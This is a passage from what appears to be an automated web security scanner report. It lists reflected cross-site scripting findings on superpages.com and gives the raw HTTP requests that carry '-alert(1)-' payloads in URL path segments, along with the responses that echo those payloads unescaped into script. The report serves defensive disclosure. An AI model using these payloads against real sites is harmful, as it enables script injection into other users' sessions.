= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile49cd4"-alert(1)-"96eceb6ffe4/js/busprofile.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.551. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/busprofile.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b019f"-alert(1)-"5e23dbe0df5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/jsb019f"-alert(1)-"5e23dbe0df5/busprofile.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/jsb019f&quot;-alert(1)-&quot;5e23dbe0df5/busprofile.js
Server: Unspecified
Set-Cookie: JSESSIONID=91DA6ED19F90F3B9CFE832FC9D00294D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:20 GMT
Cache-Control: private
Content-Length: 36093


                       <!--
       
       -->


                                   
...[SNIP]...
http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/jsb019f"-alert(1)-"5e23dbe0df5/busprofile.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.552. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/busprofile.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af28c"-alert(1)-"d5cdefab79b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/js/busprofile.jsaf28c"-alert(1)-"d5cdefab79b HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/js/busprofile.jsaf28c&quot;-alert(1)-&quot;d5cdefab79b
Server: Unspecified
Set-Cookie: JSESSIONID=C8CAA79C6FFF661580B5A8414F30FFC0; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:29 GMT
Cache-Control: private
Content-Length: 36093


                       <!--
       
       -->


                                   
...[SNIP]...
ages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/js/busprofile.jsaf28c"-alert(1)-"d5cdefab79b?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.553. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/csiframe.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edb86"-alert(1)-"af2b6080645 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofileedb86"-alert(1)-"af2b6080645/js/csiframe.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofileedb86&quot;-alert(1)-&quot;af2b6080645/js/csiframe.js
Server: Unspecified
Set-Cookie: JSESSIONID=C289443CC4D1CCC15509FEB05BD2B338; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:08 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofileedb86"-alert(1)-"af2b6080645/js/csiframe.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.554. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/csiframe.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bae2"-alert(1)-"d1c4fd37467 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/js1bae2"-alert(1)-"d1c4fd37467/csiframe.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/js1bae2&quot;-alert(1)-&quot;d1c4fd37467/csiframe.js
Server: Unspecified
Set-Cookie: JSESSIONID=4C4E33ECA8D5BE5099B80F0F1406B058; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:17 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/js1bae2"-alert(1)-"d1c4fd37467/csiframe.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.555. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/csiframe.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dd87"-alert(1)-"26871eafe34 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/js/csiframe.js1dd87"-alert(1)-"26871eafe34 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/js/csiframe.js1dd87&quot;-alert(1)-&quot;26871eafe34
Server: Unspecified
Set-Cookie: JSESSIONID=9AFB68F58057118BE89F30825428352B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:27 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
wpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/js/csiframe.js1dd87"-alert(1)-"26871eafe34?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.556. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/hide.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3c75"-alert(1)-"933c529b5ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofileb3c75"-alert(1)-"933c529b5ba/js/hide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofileb3c75&quot;-alert(1)-&quot;933c529b5ba/js/hide.js
Server: Unspecified
Set-Cookie: JSESSIONID=A833574ACD90DE7C4B955F31362CD841; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:01 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofileb3c75"-alert(1)-"933c529b5ba/js/hide.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.557. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/hide.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de57b"-alert(1)-"653154b748 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/jsde57b"-alert(1)-"653154b748/hide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/jsde57b&quot;-alert(1)-&quot;653154b748/hide.js
Server: Unspecified
Set-Cookie: JSESSIONID=0A571CCB92825CFBE44F2D68AAF5D862; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:09 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/jsde57b"-alert(1)-"653154b748/hide.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.558. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/hide.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30f72"-alert(1)-"1d6df26e138 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/js/hide.js30f72"-alert(1)-"1d6df26e138 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/js/hide.js30f72&quot;-alert(1)-&quot;1d6df26e138
Server: Unspecified
Set-Cookie: JSESSIONID=EE8F07BABFC571B292CA39BD37E9CCCB; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:20 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
ellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/js/hide.js30f72"-alert(1)-"1d6df26e138?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.559. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/photos.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41f5f"-alert(1)-"a4339366c19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile41f5f"-alert(1)-"a4339366c19/js/photos.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile41f5f&quot;-alert(1)-&quot;a4339366c19/js/photos.js
Server: Unspecified
Set-Cookie: JSESSIONID=FB668622B170916BD529AC461293019E; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:04 GMT
Cache-Control: private
Content-Length: 36085


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile41f5f"-alert(1)-"a4339366c19/js/photos.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.560. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/photos.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bda1"-alert(1)-"1e48a19052d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/js9bda1"-alert(1)-"1e48a19052d/photos.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/js9bda1&quot;-alert(1)-&quot;1e48a19052d/photos.js
Server: Unspecified
Set-Cookie: JSESSIONID=B2551730408681FE84948CBA5537D917; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:12 GMT
Cache-Control: private
Content-Length: 36085


                       <!--
       
       -->


                                   
...[SNIP]...
http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/js9bda1"-alert(1)-"1e48a19052d/photos.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.561. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/photos.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92aa7"-alert(1)-"ad045aaf68e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/js/photos.js92aa7"-alert(1)-"ad045aaf68e HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/js/photos.js92aa7&quot;-alert(1)-&quot;ad045aaf68e
Server: Unspecified
Set-Cookie: JSESSIONID=8B974E034538B797392AD6254625C8BF; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:22 GMT
Cache-Control: private
Content-Length: 36085


                       <!--
       
       -->


                                   
...[SNIP]...
lowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/js/photos.js92aa7"-alert(1)-"ad045aaf68e?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.562. http://yellowpages.superpages.com/busprofile/script.more.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/script.more.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50c0b"-alert(1)-"1189d0fb19e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile50c0b"-alert(1)-"1189d0fb19e/script.more.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile50c0b&quot;-alert(1)-&quot;1189d0fb19e/script.more.js
Server: Unspecified
Set-Cookie: JSESSIONID=E9DAEB1458FBC9F0B5240D898F7B6C6D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:21 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile50c0b"-alert(1)-"1189d0fb19e/script.more.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.563. http://yellowpages.superpages.com/busprofile/script.more.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/script.more.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 696df"-alert(1)-"ae58cd1d73c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/script.more.js696df"-alert(1)-"ae58cd1d73c HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/script.more.js696df&quot;-alert(1)-&quot;ae58cd1d73c
Server: Unspecified
Set-Cookie: JSESSIONID=42E6EF654C25ED299F245617595471E5; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:30 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
wpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/script.more.js696df"-alert(1)-"ae58cd1d73c?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.564. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/forms.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27e37"-alert(1)-"a77217be230 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common27e37"-alert(1)-"a77217be230/css/forms.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common27e37&quot;-alert(1)-&quot;a77217be230/css/forms.css
Server: Unspecified
Set-Cookie: JSESSIONID=DE3B6F76810C5748044659F1E3097E68; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:28 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common27e37"-alert(1)-"a77217be230/css/forms.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.565. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/forms.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7342"-alert(1)-"107199becab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

